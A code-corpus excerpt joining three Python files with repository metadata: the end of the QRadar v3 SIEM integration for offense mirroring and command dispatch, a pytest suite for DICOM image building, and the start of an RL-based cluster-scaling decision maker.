'sourceip': 'str',
'sourceport': 'int',
'destinationip': 'str',
'destinationport': 'int',
'qiddescription_qid': 'str',
'username': 'NoneType',
'rulename_creeventlist': 'str',
'sourcegeographiclocation': 'str',
'sourceMAC': 'str',
'sourcev6': 'str',
'destinationgeographiclocation': 'str',
'destinationv6': 'str',
'logsourcetypename_devicetype': 'str',
'credibility': 'int',
'severity': 'int',
'magnitude': 'int',
'eventcount': 'int',
'eventDirection': 'str',
'postNatDestinationIP': 'str',
'postNatDestinationPort': 'int',
'postNatSourceIP': 'str',
'postNatSourcePort': 'int',
'preNatDestinationPort': 'int',
'preNatSourceIP': 'str',
'preNatSourcePort': 'int',
'utf8_payload': 'str',
'starttime': 'str',
'devicetime': 'int'
}
}
assets = {
'assets': {
'interfaces': {
'mac_address': 'str',
'ip_addresses': {
'type': 'str',
'value': 'str'
},
'id': 'int',
'Unified Name': 'str',
'Technical User': 'str',
'Switch ID': 'str',
'Business Contact': 'str',
'CVSS Availability Requirement': 'str',
'Compliance Notes': 'str',
'Primary OS ID': 'str',
'Compliance Plan': 'str',
'Switch Port ID': 'str',
'Weight': 'str',
'Location': 'str',
'CVSS Confidentiality Requirement': 'str',
'Technical Contact': 'str',
'Technical Owner': 'str',
'CVSS Collateral Damage Potential': 'str',
'Description': 'str',
'Business Owner': 'str',
'CVSS Integrity Requirement': 'str'
},
'id': 'int',
'domain_id': 'int',
'domain_name': 'str'
}
}
# if this call fails, raise an error and stop command execution
custom_fields = {
'events': {field.get('name'): field.get('property_type')
for field in client.custom_properties()
if 'name' in field and 'property_type' in field}
}
fields = {
'Offense': offense,
'Events: Builtin Fields': events,
'Events: Custom Fields': custom_fields,
'Assets': assets,
}
return fields
def update_events_mirror_message(mirror_options: Optional[Any], events_limit: int,
failure_message: str, events_count: int, events_mirrored: int) -> str:
"""Return the offense's events' mirror error message.
Args:
mirror_options (str): The mirror options for the instance.
events_limit (int): The events limit for the mirroring.
failure_message (str): A failure message if there was a failure during fetching of events.
events_count (int): The number of events in the offense.
events_mirrored (int): The number of events mirrored in the offense
Returns: (str) An updated offense events mirror message.
"""
mirroring_events_message = 'Unknown'
print_debug_msg(f"mirror_options {mirror_options}\n events_limit {events_limit} \n"
f"failure_message {failure_message}\n events_count {events_count}\n "
f"events_mirrored {events_mirrored}")
if mirror_options != MIRROR_OFFENSE_AND_EVENTS:
mirroring_events_message = ''
elif events_mirrored < min(events_count, events_limit) and failure_message:
mirroring_events_message = failure_message
elif events_mirrored == events_limit:
mirroring_events_message = 'Mirroring events has reached events limit in this incident.'
elif events_mirrored == events_count:
mirroring_events_message = 'All available events in the offense were mirrored.'
return mirroring_events_message
def json_loads_inner(json_dumps_list: List[str]) -> list:
""" Json load values of list.
Args:
json_dumps_list: A list with json dumps as nodes.
Returns: json loaded list of the json dumps in the original list.
"""
python_object_list = []
for json_dump in json_dumps_list:
try:
python_object_list.append(json.loads(json_dump))
except Exception as e:
demisto.error(f'Exception {e} when trying to json parse {json_dump}, as part of {json_dumps_list}')
raise e
return python_object_list
def json_dumps_inner(listed_objects: list) -> List[str]:
""" Json dump values of list.
Args:
listed_objects: A list with nodes to be json dumped.
Returns: json dumped list of the json dumps in the original list.
"""
listed_json_dumps = []
for python_object in listed_objects:
listed_json_dumps.append(json.dumps(python_object))
return listed_json_dumps
def extract_context_data(context_data: dict, include_id: bool = False) -> dict:
"""Transform the context data from partially json encoded to fully decoded.
Args:
context_data: The context data.
include_id: Whether to include id in the encoding of the data.
Returns: The extracted context data.
"""
new_context_data = context_data.copy()
new_context_data.pop(LAST_FETCH_KEY, None)
if not new_context_data:
new_context_data = {}
new_context_data.update({
UPDATED_MIRRORED_OFFENSES_CTX_KEY: json_loads_inner(json.loads(
context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, '[]'))),
MIRRORED_OFFENSES_CTX_KEY: json_loads_inner(json.loads(context_data.get(MIRRORED_OFFENSES_CTX_KEY, '[]'))),
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: json_loads_inner(json.loads(
context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, '[]'))),
'samples': json_loads_inner(json.loads(context_data.get('samples', '[]'))),
'last_mirror_update': json.loads(context_data.get('last_mirror_update', '0'))
})
if include_id and LAST_FETCH_KEY in context_data:
new_context_data.update({LAST_FETCH_KEY: int(json.loads(context_data.get(LAST_FETCH_KEY, '0')))})
return new_context_data
def encode_context_data(context_data: dict, include_id: bool = False) -> dict:
"""Transform the context data from a decoded python object form to a partially json encoded form.
This is done in order to maintain compatibility with the set_to_integration_context_with_retries command.
Args:
context_data: The context data in its decoded python object form
include_id: Whether to include id in the encoding of the data.
Returns: The context data in its partially json encoded form.
"""
new_context_data = context_data.copy()
new_context_data.pop('retry_compatible', None)
new_context_data.pop(LAST_FETCH_KEY, None)
new_context_data.pop(RESET_KEY, None)
new_context_data.update({
UPDATED_MIRRORED_OFFENSES_CTX_KEY: json_dumps_inner(context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])),
MIRRORED_OFFENSES_CTX_KEY: json_dumps_inner(context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])),
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: json_dumps_inner(context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY,
[])),
'samples': json_dumps_inner(context_data.get('samples', [])),
'last_mirror_update': str(context_data.get('last_mirror_update', 0))
})
if include_id and LAST_FETCH_KEY in context_data:
new_context_data.update({LAST_FETCH_KEY: int(context_data.get(LAST_FETCH_KEY, 0))})
return new_context_data
@safely_update_context_data
def remove_offense_from_context_data(context_data: dict, version: Any, offense_id: str,
offense_to_remove: str) -> Tuple[dict, Any, dict]:
"""Remove an offense from context data UPDATED_MIRRORED_OFFENSES_CTX_KEY and RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY.
Args:
context_data: The context data to update.
version: The version of the context data to update.
offense_id: The offense id to remove from RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY.
offense_to_remove: The offense to remove from UPDATED_MIRRORED_OFFENSES_CTX_KEY.
Returns: (The new context_data, The context_data version the change was based on, The new context_data)
"""
updated = context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])
resubmitted = context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, [])
if offense_to_remove and offense_to_remove in updated:
updated.remove(offense_to_remove)
if offense_id in resubmitted:
resubmitted.remove(offense_id)
context_data[RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY] = resubmitted
context_data[UPDATED_MIRRORED_OFFENSES_CTX_KEY] = updated
return encode_context_data(context_data), version, context_data
def get_remote_data_command(client: Client, params: Dict[str, Any], args: Dict) -> GetRemoteDataResponse:
"""
get-remote-data command: Returns an updated incident and entries
If offense's events were updated in the long running container, update the demisto incident.
Args:
client (Client): QRadar client to perform the API calls.
params (Dict): Demisto params.
args (Dict):
id: Offense id to retrieve.
lastUpdate: When was the last time we data was retrieved in Epoch.
Returns:
GetRemoteDataResponse.
"""
print_debug_msg("Started GetRemoteData")
remote_args = GetRemoteDataArgs(args)
ip_enrich, asset_enrich = get_offense_enrichment(params.get('enrichment', 'IPs And Assets'))
offense_id = remote_args.remote_incident_id
# if this call fails, raise an error and stop command execution
offense = client.offenses_list(offense_id=offense_id)
offense_last_update = get_time_parameter(offense.get('last_persisted_time'))
mirror_options = params.get('mirror_options')
raw_context, context_version = get_integration_context_with_version()
context_data = extract_context_data(raw_context.copy())
events_limit = int(params.get('events_limit') or DEFAULT_EVENTS_LIMIT)
processed_offenses = print_mirror_events_stats(context_data, f"Starting Get Remote Data For "
f"Offense {str(offense.get('id'))}")
# versions below 6.1 compatibility
last_update = get_time_parameter(args.get('lastUpdate'))
if last_update and last_update > offense_last_update and str(offense.get("id")) not in processed_offenses:
demisto.debug('Nothing new in the ticket')
return GetRemoteDataResponse({'id': offense_id, 'mirroring_events_message': 'Nothing new in the ticket.'}, [])
demisto.debug(f'Updating offense. Offense last update was {offense_last_update}')
entries = []
if offense.get('status') == 'CLOSED' and argToBoolean(params.get('close_incident', False)):
demisto.debug(f'Offense is closed: {offense}')
try:
if closing_reason := offense.get('closing_reason_id', ''):
closing_reason = client.closing_reasons_list(closing_reason).get('text')
offense_close_time = offense.get('close_time', '')
closed_offense_notes = client.offense_notes_list(offense_id, f'items={DEFAULT_RANGE_VALUE}',
filter_=f'create_time >= {offense_close_time}')
# In QRadar UI, when you close a reason, a note is added with the reason and more details. Try to get note
# if exists, else fallback to closing reason only, as closing QRadar through an API call does not create a note.
close_reason_with_note = next((note.get('note_text') for note in closed_offense_notes if
note.get('note_text').startswith('This offense was closed with reason:')),
closing_reason)
if not close_reason_with_note:
print_debug_msg(f'Could not find closing reason or closing note for offense with offense id {offense_id}')
close_reason_with_note = 'Unknown closing reason from QRadar'
else:
close_reason_with_note = f'From QRadar: {close_reason_with_note}'
except Exception as e:
demisto.error(f'Failed to get closing reason with error: {e}')
close_reason_with_note = 'Unknown closing reason from QRadar'
entries.append({
'Type': EntryType.NOTE,
'Contents': {
'dbotIncidentClose': True,
'closeReason': close_reason_with_note
},
'ContentsFormat': EntryFormat.JSON
})
failure_message = 'Failed communicating with long running container.'
if mirror_options == MIRROR_OFFENSE_AND_EVENTS:
offenses_waiting_for_update = context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])
max_retries = min(MAX_FETCH_EVENT_RETIRES * (len(offenses_waiting_for_update) + 3), 20)
offense_to_remove = None
is_waiting_to_be_updated = True
evented_offense = None
retries = 0
while ((not evented_offense) or is_waiting_to_be_updated) and retries < max_retries:
if retries != 0:
time.sleep(FAILURE_SLEEP)
raw_context, context_version = get_integration_context_with_version()
context_data = extract_context_data(raw_context.copy())
print_mirror_events_stats(context_data, f"Get Remote Data Loop for id {offense.get('id')}, retry {retries}")
retries += 1
offenses_with_updated_events = context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])
offenses_waiting_for_update = context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])
evented_offense = [evented_offense for evented_offense in offenses_with_updated_events
if str(evented_offense.get('id')) == str(offense.get("id"))]
is_waiting_to_be_updated = any([True for waiting_offense in offenses_waiting_for_update
if str(waiting_offense.get('id')) == str(offense.get("id"))])
if evented_offense:
demisto.debug(f"Mirror Events: Offense {offense.get('id')} events were updated, updating incident.")
if evented_offense[0].get('events'):
offense['events'] = evented_offense[0].get('events')
failure_message = evented_offense[0].get('mirroring_events_message', '')
demisto.debug(f"Mirror Events: Offense {offense.get('id')} now has {len(offense.get('events'))} "
f"fetched events. Mirror message: {failure_message}")
offense_to_remove = evented_offense[0]
elif is_waiting_to_be_updated:
failure_message = 'In queue.'
new_context_data = remove_offense_from_context_data(offense_id=offense_id, offense_to_remove=offense_to_remove,
version=context_version,
context_data=context_data)
print_mirror_events_stats(new_context_data, f"Get Remote Data End for id {offense.get('id')}")
enriched_offense = enrich_offenses_result(client, offense, ip_enrich, asset_enrich)
final_offense_data = sanitize_outputs(enriched_offense)[0]
events_message = update_events_mirror_message(
mirror_options=mirror_options,
events_limit=events_limit,
failure_message=failure_message,
events_count=int(final_offense_data.get('event_count', 0)),
events_mirrored=len(final_offense_data.get('events', [])))
final_offense_data['last_mirror_in_time'] = datetime.now().isoformat()
final_offense_data['mirroring_events_message'] = events_message
return GetRemoteDataResponse(final_offense_data, entries)
@safely_update_context_data
def add_modified_remote_offenses(context_data: dict, version: str, mirror_options: str, new_modified_records_ids: list,
current_last_update: str, offenses: list) -> Tuple[dict, str, list]:
"""Add modified remote offenses to context_data and handle exhausted offenses.
Args:
context_data: The context data to update.
version: The version of the context data to update.
mirror_options: The mirror options for the integration.
new_modified_records_ids: The new modified offenses ids.
current_last_update: The current last mirror update.
offenses: The offenses to update.
Returns: (The new context data, The context_data version the changes were based on, The new modified records ids)
"""
new_context_data = context_data.copy()
print_debug_msg(f'Saving New Highest ID: {context_data.get(LAST_FETCH_KEY, 0)}')
new_context_data.update({'last_mirror_update': current_last_update})
if mirror_options == MIRROR_OFFENSE_AND_EVENTS:
print_mirror_events_stats(new_context_data, "Get Modified Remote Data - Before update")
mirrored_offenses = merge_lists(original_list=context_data.get(MIRRORED_OFFENSES_CTX_KEY, []),
updated_list=offenses,
key='id')
new_context_data.update({MIRRORED_OFFENSES_CTX_KEY: mirrored_offenses})
remaining_resubmitted_offenses = context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, []).copy()
updated_mirrored_offenses = context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])
clean_updates_mirrored_offenses = updated_mirrored_offenses.copy()
if remaining_resubmitted_offenses:
for offense in updated_mirrored_offenses:
if str(offense.get("id")) in remaining_resubmitted_offenses:
print_debug_msg(f"Removing Offense id {offense.get('id')} from processing Mirrored Events "
f"since its incident is not responding. (It is probably closed)")
clean_updates_mirrored_offenses.remove(offense)
new_context_data.update({UPDATED_MIRRORED_OFFENSES_CTX_KEY: clean_updates_mirrored_offenses})
new_context_data.update({RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: []})
clean_updates_mirrored_offenses_ids = [str(offense.get('id')) for offense in clean_updates_mirrored_offenses]
if clean_updates_mirrored_offenses_ids:
new_modified_records_ids = list(set(new_modified_records_ids + clean_updates_mirrored_offenses_ids))
new_context_data.update({RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: clean_updates_mirrored_offenses_ids})
print_mirror_events_stats(new_context_data, "Get Modified Remote Data - After update")
return encode_context_data(new_context_data, include_id=False), version, new_modified_records_ids
def get_modified_remote_data_command(client: Client, params: Dict[str, str],
args: Dict[str, str]) -> GetModifiedRemoteDataResponse:
"""
Performs API calls to QRadar service, querying for offenses that were updated in QRadar later than
the last update time given in the argument 'lastUpdate'.
Args:
client (Client): QRadar client to perform the API calls.
params (Dict): Demisto params.
args (Dict): Demisto arguments.
Returns:
(GetModifiedRemoteDataResponse): IDs of the offenses that have been modified in QRadar.
"""
raw_ctx, ctx_version = get_integration_context_with_version()
ctx = extract_context_data(raw_ctx, include_id=True)
remote_args = GetModifiedRemoteDataArgs(args)
highest_fetched_id = ctx.get(LAST_FETCH_KEY, 0)
limit: int = int(params.get('mirror_limit', MAXIMUM_MIRROR_LIMIT))
range_ = f'items=0-{limit - 1}'
last_update_time = ctx.get('last_mirror_update', 0)
if not last_update_time:
last_update_time = remote_args.last_update
last_update = get_time_parameter(last_update_time, epoch_format=True)
# if this call fails, raise an error and stop command execution
offenses = client.offenses_list(range_=range_,
filter_=f'id <= {highest_fetched_id} AND last_persisted_time > {last_update}',
sort='+last_persisted_time',
fields='id,start_time,event_count,last_persisted_time')
new_modified_records_ids = [str(offense.get('id')) for offense in offenses if 'id' in offense]
current_last_update = last_update if not offenses else offenses[-1].get('last_persisted_time')
new_modified_records_ids = add_modified_remote_offenses(context_data=ctx, version=ctx_version,
mirror_options=params.get('mirror_options'),
new_modified_records_ids=new_modified_records_ids,
current_last_update=current_last_update,
offenses=offenses)
return GetModifiedRemoteDataResponse(new_modified_records_ids)
def clear_integration_ctx(ctx: dict) -> dict:
"""Return a cleared context_data dict so set_integration_context could be called on it.
Calling set_integration_context with the output of this function ensures the next call to
set_to_integration_context_with_retries will not fail.
Args:
ctx: The context_data to simplify
Returns: The cleared context_data
"""
fetch_id_ctx: str = ctx.get(LAST_FETCH_KEY) or '0'
try:
fetch_id = int(fetch_id_ctx)
except ValueError:
try:
fetch_id = int(json.loads(fetch_id_ctx))
except ValueError:
print_debug_msg(f"Could not retrive LAST_FETCH_KEY from {fetch_id_ctx} Setting to 0")
fetch_id = 0
last_update_ctx: str = ctx.get('last_mirror_update') or '0'
try:
last_update = str(int(last_update_ctx))
except ValueError:
try:
last_update = str(int(json.loads(last_update_ctx)))
except ValueError:
print_debug_msg(f"Could not retrive last_mirror_update from {last_update_ctx} Setting to '0'")
last_update = '0'
return {LAST_FETCH_KEY: json.dumps(fetch_id),
'last_mirror_update': json.dumps(last_update),
UPDATED_MIRRORED_OFFENSES_CTX_KEY: '[]',
MIRRORED_OFFENSES_CTX_KEY: '[]',
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: '[]',
'samples': '[]'}
def change_ctx_to_be_compatible_with_retry() -> None:
"""
In order to move QRadar from using set_integration_context to set_to_integration_context_with_retries, the fields
need to change to JSON strings.
Change is required due to race condition occurring between get-modified-remote-data to long-running-execution.
Because some customers already have instances running where fields are not JSON fields, this function is needed
to make them be compatible with new changes.
Returns:
(None): Modifies context to be compatible.
"""
ctx = get_integration_context()
new_ctx = ctx.copy()
try:
extracted_ctx = extract_context_data(ctx)
print_mirror_events_stats(extracted_ctx, "Checking ctx")
print_debug_msg("ctx was found to be compatible with retries")
extract_works = True
except Exception as e:
print_debug_msg(f"extracting ctx {ctx} failed, trying to make it retry compatible. Error was: {str(e)}")
extract_works = False
if not extract_works:
cleared_ctx = clear_integration_ctx(new_ctx)
print_debug_msg(f"Change ctx context data was cleared and changing to {cleared_ctx}")
set_integration_context(cleared_ctx)
print_debug_msg(f"Change ctx context data was cleared and changed to {cleared_ctx}")
''' MAIN FUNCTION '''
def main() -> None:
params = demisto.params()
command = demisto.command()
args = demisto.args()
# handle allowed advanced parameters
adv_params = params.get('adv_params')
if adv_params:
try:
globals_ = globals()
for adv_p in adv_params.split(','):
adv_p_kv = [item.strip() for item in adv_p.split('=')]
if len(adv_p_kv) != 2:
raise DemistoException(
f'Failed to parse advanced parameter: {adv_p} - please make sure you entered it correctly.')
adv_param_name = adv_p_kv[0]
if adv_param_name in ADVANCED_PARAMETERS_STRING_NAMES:
globals_[adv_p_kv[0]] = adv_p_kv[1]
elif adv_param_name in ADVANCED_PARAMETER_INT_NAMES:
globals_[adv_p_kv[0]] = int(adv_p_kv[1])
else:
raise DemistoException(
f'The parameter: {adv_p_kv[0]} is not a valid advanced parameter. Please remove it')
except DemistoException as e:
raise DemistoException(f'Failed to parse advanced params. Error: {e.message}')
except Exception as e:
raise DemistoException(f'Failed to parse advanced params. Error: {e}')
server = params.get('server')
verify_certificate = not params.get('insecure', False)
proxy = params.get('proxy', False)
api_version = params.get('api_version')
if float(api_version) < MINIMUM_API_VERSION:
raise DemistoException(f'API version cannot be lower than {MINIMUM_API_VERSION}')
credentials = params.get('credentials')
try:
client = Client(
server=server,
verify=verify_certificate,
proxy=proxy,
api_version=api_version,
credentials=credentials)
# All command names with or are for supporting QRadar v2 command names for backward compatibility
if command == 'test-module':
return_results(test_module_command(client, params))
elif command == 'fetch-incidents':
demisto.incidents(fetch_incidents_command())
elif command == 'long-running-execution':
change_ctx_to_be_compatible_with_retry()
support_multithreading()
long_running_execution_command(client, params)
elif command == 'qradar-offenses-list' or command == 'qradar-offenses' or command == 'qradar-offense-by-id':
return_results(qradar_offenses_list_command(client, args))
elif command == 'qradar-offense-update' or command == 'qradar-update-offense':
return_results(qradar_offense_update_command(client, args))
elif command == 'qradar-closing-reasons' or command == 'qradar-get-closing-reasons':
return_results(qradar_closing_reasons_list_command(client, args))
elif command == 'qradar-offense-notes-list' or command == 'qradar-get-note':
return_results(qradar_offense_notes_list_command(client, args))
elif command == 'qradar-offense-note-create' or command == 'qradar-create-note':
return_results(qradar_offense_notes_create_command(client, args))
elif command == 'qradar-rules-list':
return_results(qradar_rules_list_command(client, args))
elif command == 'qradar-rule-groups-list':
return_results(qradar_rule_groups_list_command(client, args))
elif command == 'qradar-assets-list' or command == 'qradar-get-assets' or command == 'qradar-get-asset-by-id':
return_results(qradar_assets_list_command(client, args))
elif command == 'qradar-saved-searches-list':
return_results(qradar_saved_searches_list_command(client, args))
elif command == 'qradar-searches-list':
return_results(qradar_searches_list_command(client, args))
elif command == 'qradar-search-create' or command == 'qradar-searches':
return_results(qradar_search_create_command(client, args))
elif command == 'qradar-search-status-get' or command == 'qradar-get-search':
return_results(qradar_search_status_get_command(client, args))
elif command == 'qradar-search-results-get' or command == 'qradar-get-search-results':
return_results(qradar_search_results_get_command(client, args))
elif command == 'qradar-reference-sets-list' or command == 'qradar-get-reference-by-name':
return_results(qradar_reference_sets_list_command(client, args))
elif command == 'qradar-reference-set-create' or command == 'qradar-create-reference-set':
return_results(qradar_reference_set_create_command(client, args))
elif command == 'qradar-reference-set-delete' or command == 'qradar-delete-reference-set':
return_results(qradar_reference_set_delete_command(client, args))
elif command == 'qradar-reference-set-value-upsert' or command == 'qradar-create-reference-set-value' or \
command == 'qradar-update-reference-set-value':
return_results(qradar_reference_set_value_upsert_command(client, args))
elif command == 'qradar-reference-set-value-delete' or command == 'qradar-delete-reference-set-value':
return_results(qradar_reference_set_value_delete_command(client, args))
elif command == 'qradar-domains-list' or command == 'qradar-get-domains' or \
command == 'qradar-get-domain-by-id':
return_results(qradar_domains_list_command(client, args))
elif command == 'qradar-indicators-upload' or command == 'qradar-upload-indicators':
return_results(qradar_indicators_upload_command(client, args))
elif command == 'qradar-geolocations-for-ip':
return_results(qradar_geolocations_for_ip_command(client, args))
elif command == 'qradar-log-sources-list':
return_results(qradar_log_sources_list_command(client, args))
elif command == 'qradar-get-custom-properties':
return_results(qradar_get_custom_properties_command(client, args))
elif command == 'qradar-ips-source-get':
return_results(qradar_ips_source_get_command(client, args))
elif command == 'qradar-ips-local-destination-get':
return_results(qradar_ips_local_destination_get_command(client, args))
elif command == 'qradar-reset-last-run':
return_results(qradar_reset_last_run_command())
elif command == 'get-mapping-fields':
return_results(qradar_get_mapping_fields_command(client))
elif command == 'get-remote-data':
change_ctx_to_be_compatible_with_retry()
return_results(get_remote_data_command(client, params, args))
elif command == 'get-modified-remote-data':
change_ctx_to_be_compatible_with_retry()
return_results(get_modified_remote_data_command(client, params, args))
else:
raise NotImplementedError(f'''Command '{command}' is not implemented.''')
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
print_debug_msg(f"The integration context_data is {get_integration_context()}")
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
register_signal_handler_profiling_dump(profiling_dump_rows_limit=PROFILING_DUMP_ROWS_LIMIT)
main()
|
demisto/content
|
Packs/QRadar/Integrations/QRadar_v3/QRadar_v3.py
|
Python
|
mit
| 164,136
| 0.003649
|
import os
from collections import defaultdict
from dataclasses import asdict
from pathlib import Path
from unittest import mock
import numpy as np
import pydicom
import pytest
from panimg.image_builders.dicom import (
_get_headers_by_study,
_validate_dicom_files,
format_error,
image_builder_dicom,
)
from panimg.image_builders.metaio_utils import parse_mh_header
from panimg.panimg import _build_files
from grandchallenge.cases.models import Image
from tests.cases_tests import RESOURCE_PATH
DICOM_DIR = RESOURCE_PATH / "dicom"
def test_get_headers_by_study():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 1
for key in studies:
assert [str(x["file"]) for x in studies[key]["headers"]] == [
f"{DICOM_DIR}/{x}.dcm" for x in range(1, 77)
]
for root, _, files in os.walk(RESOURCE_PATH):
files = [Path(root).joinpath(f) for f in files]
break
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 0
def test_validate_dicom_files():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _validate_dicom_files(files, defaultdict(list))
assert len(studies) == 1
for study in studies:
headers = study.headers
assert study.n_time == 19
assert study.n_slices == 4
with mock.patch(
"panimg.image_builders.dicom._get_headers_by_study",
return_value={
"foo": {"headers": headers[1:], "file": "bar", "index": 1},
},
):
errors = defaultdict(list)
studies = _validate_dicom_files(files, errors)
assert len(studies) == 0
for header in headers[1:]:
assert errors[header["file"]] == [
format_error("Number of slices per time point differs")
]
def test_image_builder_dicom_4dct(tmpdir):
files = {Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert result.consumed_files == {
Path(DICOM_DIR).joinpath(f"{x}.dcm") for x in range(1, 77)
}
assert len(result.new_images) == 1
image = Image(**asdict(result.new_images.pop()))
assert image.shape == [19, 4, 2, 3]
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
direction = headers["TransformMatrix"].split()
origin = headers["Offset"].split()
spacing = headers["ElementSpacing"].split()
exposures = headers["Exposures"].split()
content_times = headers["ContentTimes"].split()
assert len(exposures) == 19
assert exposures == [str(x) for x in range(100, 2000, 100)]
assert len(content_times) == 19
assert content_times == [str(x) for x in range(214501, 214520)]
dcm_ref = pydicom.dcmread(str(DICOM_DIR / "1.dcm"))
assert np.array_equal(
np.array(list(map(float, direction))).reshape((4, 4)), np.eye(4)
)
assert np.allclose(
list(map(float, spacing))[:2],
list(map(float, list(dcm_ref.PixelSpacing),)),
)
assert np.allclose(
list(map(float, origin)),
list(map(float, dcm_ref.ImagePositionPatient)) + [0.0],
)
@pytest.mark.parametrize(
"folder,element_type",
[
("dicom", "MET_SHORT"),
("dicom_intercept", "MET_FLOAT"),
("dicom_slope", "MET_FLOAT"),
],
)
def test_dicom_rescaling(folder, element_type, tmpdir):
"""
2.dcm in dicom_intercept and dicom_slope has been modified to add a
small intercept (0.01) or slope (1.001) respectively.
"""
files = [
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / folder)
for f in d[2]
]
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["ElementType"] == element_type
def test_dicom_window_level(tmpdir):
files = {
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / "dicom")
for f in d[2]
}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["WindowCenter"] == "30"
assert headers["WindowWidth"] == "200"
assert len(result.new_images) == 1
image_obj = result.new_images.pop()
assert image_obj.window_center == 30.0
assert image_obj.window_width == 200.0
|
comic/comic-django
|
app/tests/cases_tests/test_dicom.py
|
Python
|
apache-2.0
| 5,037
| 0
|
__author__ = 'tiramola group'
import os, datetime, operator, math, random, itertools, time
import numpy as np
from lib.fuzz import fgraph, fset
from scipy.cluster.vq import kmeans2
from lib.persistance_module import env_vars
from scipy.stats import linregress
from collections import deque
from lib.tiramola_logging import get_logger
from Predictor import Predictor
class RLDecisionMaker:
def __init__(self, cluster):
#Create logger
LOG_FILENAME = 'files/logs/Coordinator.log'
self.log = get_logger('RLDecisionMaker', 'INFO', logfile=LOG_FILENAME)
self.log.info("Using 'gain' : " + env_vars['gain'] +" with threshold of "+str( env_vars["decision_threshold"]*100) + "% and interval: " + str(env_vars['decision_interval']))
self.log.info("Cluster Size from %d to %d nodes" % (env_vars['min_cluster_size'], env_vars['max_cluster_size']))
self.debug = False
if self.debug:
self.currentState = 8
else:
self.currentState = cluster.node_count()
self.cluster = cluster
self.nextState = self.currentState
self.waitForIt = env_vars['decision_interval'] / env_vars['metric_fetch_interval']
self.pending_action = None
self.decision = {"action": "PASS", "count": 0}
# The policy for getting throughput and latency when computing the reward func.
# average, centroid
self.measurementsPolicy = 'centroid'
self.prediction = env_vars['use_prediction']
self.predictor = Predictor()
# used only in simulation!!
self.countdown = 0
# A dictionary that will remember rewards and metrics in states previously visited
self.memory = {}
for i in range(env_vars["min_cluster_size"], env_vars["max_cluster_size"] + 1):
self.memory[str(i)] = {}
#self.memory[str(i)]['V'] = None # placeholder for rewards and metrics
self.memory[str(i)]['r'] = None
self.memory[str(i)]['arrayMeas'] = None
# Load any previous statics.
self.measurementsFile = env_vars["measurements_file"]
self.trainingFile = env_vars["training_file"]
self.sumMetrics = {}
# initialize measurements file
meas = open(self.measurementsFile, 'a+')
if os.stat(self.measurementsFile).st_size == 0:
# The file is empty, set the headers for each column.
meas.write('State\t\tLambda\t\tThroughput\t\tLatency\t\tCPU\t\tTime\n')
meas.close()
# load training set
meas = open(self.trainingFile, 'r+')
if os.stat(self.trainingFile).st_size != 0:
# Read the training set measurements saved in the file.
meas.next() # Skip the first line with the headers of the columns
for line in meas:
# Skip comments (used in training sets)
if not line.startswith('###'):
m = line.split('\t\t')
self.add_measurement(m)
meas.close()
def add_measurement(self, metrics, write_file=False, write_mem=True):
"""
adds the measurement to either memory or file or both
@param metrics: array The metrics to store. An array containing [state, lamdba, throughput, latency, time]
@param writeFile: boolean If set write the measurement in the txt file
:return:
"""
if self.measurementsPolicy.startswith('average'):
if not self.sumMetrics.has_key(metrics[0]):
# Save the metric with the state as key metrics = [state, inlambda, throughput, latency]
self.sumMetrics[metrics[0]] = {'inlambda': 0.0, 'throughput': 0.0, 'latency': 0.0, 'divide_by': 0}
self.sumMetrics[metrics[0]] = {'inlambda': self.sumMetrics[metrics[0]]['inlambda'] + float(metrics[1]),
'throughput': self.sumMetrics[metrics[0]]['throughput'] + float(metrics[2]),
'latency': self.sumMetrics[metrics[0]]['latency'] + float(metrics[3]),
'divide_by': self.sumMetrics[metrics[0]]['divide_by'] + 1}
if self.debug and write_file:
self.log.debug("add_measurements: won't load measurement to memory")
else:
if write_mem:
# metrics-> 0: state, 1: lambda, 2: thoughtput, 3:latency, 4:cpu, 5:time
if not self.memory.has_key(metrics[0]):
self.memory[str(metrics[0])] = {}
#self.memory[str(metrics[0])]['V'] = None # placeholder for rewards and metrics
self.memory[str(metrics[0])]['r'] = None
